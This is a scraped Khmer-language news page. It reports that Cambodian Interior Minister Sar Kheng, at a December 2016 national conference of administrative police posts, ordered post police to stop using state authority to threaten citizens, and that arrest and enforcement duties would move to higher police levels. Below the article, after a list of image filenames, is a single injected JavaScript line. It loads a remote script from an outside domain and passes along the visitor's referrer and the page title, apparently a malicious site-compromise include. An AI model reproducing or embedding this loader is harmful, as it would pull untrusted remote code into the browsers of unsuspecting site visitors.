Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

រដ្ឋមន្ត្រីក្រសួងមហាផ្ទៃបញ្ជាឲ្យនគរបាលប៉ុស្តិ៍ឈប់ប្រើអំណាចការងារដែលរដ្ឋផ្តល់ជូនទៅគំរាមកំហែងប្រជាពលរដ្ឋ

ភ្នំពេញ ៖ រដ្ឋមន្ត្រីក្រសួងមហាផ្ទៃ បញ្ជាឲ្យគ្រប់មន្ត្រីនគរបាលបម្រើការនៅ តាមប៉ុស្តិ៍រដ្ឋបាលនគរបាលត្រូវបញ្ឈប់ការប្រើប្រាស់សិទ្ធអំណាច ភារកិច្ច ការងារដែលរដ្ឋបានប្រគល់ជូនយកទៅរំលោភ និងគំរាមកំហែង ប្រជាពលរដ្ឋនៅក្នុងមូលដ្ឋានហើយក្រសួងមហាផ្ទៃនឹងធ្វើការកែសម្រួល ការងារ ដោយដកភារកិច្ចការងារមួយចំនួនដែលមានភាពប្រឈមក្នុងការ ទំនាក់ទំនងជាមួយប្រជាពលរដ្ឋចេញពីនគរបាលប៉ុស្តិ៍រដ្ឋបាល។

ថ្លែងក្នុងសន្និបាតប៉ុស្តិ៍នគរបាលរដ្ឋបាលទូទាំងប្រទេសលើកទី១ នាព្រឹកថ្ងៃទី៦ ខែធ្នូ ឆ្នាំ២០១៦នេះ នៅមជ្ឈមណ្ឌលពិព័រណ៍កោះពេជ្រ សម្តេចក្រឡាហោម ស ខេង ឧបនាយករដ្ឋមន្ត្រី រដ្ឋមន្ត្រីក្រសួងមហាផ្ទៃ បានថ្លែងថា ក្រសួងមហាផ្ទៃនឹងធ្វើការកែសម្រួលការងារ ដោយដកអំណាចភារកិច្ចការងារមួយចំនួនពីនគរបាលនៅថ្នាក់ប៉ុស្តិ៍រដ្ឋបាល ដែលមានភាពប្រឈមជាមួយប្រជាពលរដ្ឋទៅឲ្យនគរបាលនៅ ថ្នាក់អធិការដ្ឋានក្រុង ស្រុក ខណ្ឌ និងស្នងការដ្ឋានជាអ្នកធ្វើវិញ។

សម្តេចក្រឡាហោម ស ខេង ថា ភារកិច្ចការងារដែលត្រូវដក ចេញពី នគរបាលប៉ុស្តិ៍រដ្ឋបាលនគរបាល មិនអនុញ្ញាត្តិឲ្យធ្វើនោះរួមមាន៖ ការងារចាប់ចង ការងារអនុវត្តសាលដីការចាប់ចងរបស់តុលាការ និងការងារបង្រ្កាបបទល្មើសនានាទៀតដែលបង្កឲ្យប៉ះពាលដល់ការប្រកបមុខរបរអាជីវកម្មរបស់ប្រជាពលរដ្ឋ ហើយលើកលែងតែករណីកើតមាន បទល្មើសជាក់ស្តែងដែលការងារនេះ នគរបាលប៉ុស្តិ៍ត្រូវស្វែងរកកិច្ច សហការជាមួយប្រជាពលរដ្ឋចូលរួមគ្នាបង្រ្កាប។

សម្តេចក្រឡាហោម មានប្រសាសន៍ថា សម្រាប់ការកែសម្រួលការងារ នោះ គឺក្រសួងនឹងបែងចែកឲ្យនគរបាលប៉ុស្តិ៍រដ្ឋបាល ត្រូវធ្វើការងារ ជាច្រើនទៀតដែលនគរបាលប៉ុស្តិ៍រដ្ឋបាលត្រូវធ្វើផ្តល់ជូនប្រជាពលរដ្ឋ មានដូចជា ការចុះបញ្ជីស្ថិតិប្រជាពលរដ្ឋ ការងារធ្វើអត្តសញ្ញាណប័ណ្ណជូន ប្រជាពលរដ្ឋ ការងារការពារសន្តិសុខ សណ្តាប់ធ្នាប់ និងការ ងារផ្តល់ សេវាតម្រូវការនានាទៀតដែលប្រជាពលរដ្ឋមានតម្រូវការ ហើយសម្រាប់ ការងារនោះ ធានាថា នឹងធ្វើឲ្យប្រជាពលរដ្ឋលែង ខ្លាចអំណាចការងារ មន្ត្រីនគរបាលប៉ុស្តិ៍ និងមានទំនាក់ទំនងគ្នាល្អជាមួយនគរបាលប៉ុស្តិ៍ ហើយ នគរបាលប៉ុស្តិ៍ត្រូវមានទំនាក់ទំនងគ្នាល្អជាមួយប្រជាពលរដ្ឋវិញផងដែរ។

គួរបញ្ជាក់ថា តាមការថ្លែងរបស់ ឯកឧត្តម នាយឧត្តមសេនីយ នេត សាវឿន អគ្គស្នងការនគរបាលជាតិ មកដល់ពេលនេះកម្ពុជា នៅទូទាំង ប្រទេសមានប៉ុស្តិ៍រដ្ឋបាលនគរបាលនៅតាម ឃុំ សង្កាត់ មានប្រមាណ ជាង១៦៣៣ប៉ុស្តិ៍ មានសន្ទស្សន៍កម្លាំងមន្ត្រីនគរបាល ប្រមាណជិត ១ម៉ឺន៧ពាន់នាក់ ក្នុងនោះកម្លាំងដែលមានក្របខ័ណ្ឌមាន ប្រមាណជិត ១ម៉ឺន៥ពាន់នាក់បានកំពុងបម្រើផ្តល់សេវានៅថ្នាក់មូលដ្ឋាន។

ឯកឧត្តមថា នៅក្នុងឆ្នាំ២០១៦នេះ ក្រសួងមហាផ្ទៃ អគ្គស្នងការដ្ឋាន នគរបាលជាតិបានសម្រេចជ្រើសរើសមន្ត្រីក្របខ័ណ្ឌ នគរបាលបន្ថែម ប្រមាណជិត២០០០នាក់ ចូលទៅបំពេញការងារនៅតាមប៉ុស្តិ៍រដ្ឋបាល នគរបាល ខណៈមកដល់ពេលពេលនេះ នៅមានឃុំសង្កាត់ប្រមាណ១៩៦ ឃុំសង្កាត់នៅមិនទាន់មានស្នាក់ការធ្វើការងារ និងមានឃុំសង្កាត់ប្រមាណ ២៦៩ឃុំសង្កាត់ ទៀតបានកំពុង ដំណើរ ការសាងសង់ស្នាក់ការប៉ុស្តិ៍រដ្ឋបាល ៕

15032047_1372284556139069_4444983829065154463_n 15317727_1372284236139101_7138341941540678921_n 15327301_1372283992805792_4816624987638742403_n 15349715_1372284149472443_5744163317584731095_n 15380418_1372284599472398_7694666623128956217_n 15380550_1372283996139125_4599464407640334002_n 15380708_1372284346139090_765644587209399735_n 15380742_1372284002805791_4348593013190120654_n 15390981_1372284959472362_2054604915819634462_n 15032047_1372284556139069_4444983829065154463_n-copy

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More